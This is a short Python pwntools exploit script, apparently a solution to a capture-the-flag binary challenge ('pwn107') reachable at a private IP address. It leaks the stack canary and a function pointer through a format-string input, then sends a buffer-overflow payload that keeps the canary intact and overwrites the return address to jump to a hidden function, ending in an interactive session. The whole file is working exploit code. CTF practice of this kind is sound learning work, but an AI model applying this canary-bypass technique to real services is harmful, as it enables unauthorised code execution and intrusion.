killchain-compendium/Exploits/Binaries/Scripts/canary_bypass.py

#!/usr/bin/env python

from pwn import *
from time import sleep


#elf = context.binary =  ELF('./pwn107.pwn107')
#p = process()
p = remote('10.10.216.4', 9007)
sleep(1)
p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function
sleep(1)
addresses = (p.recv().split())[62].decode().split(',')
print(addresses)
# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function
payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45) 
p.sendline(payload)
sleep(1)
p.interactive()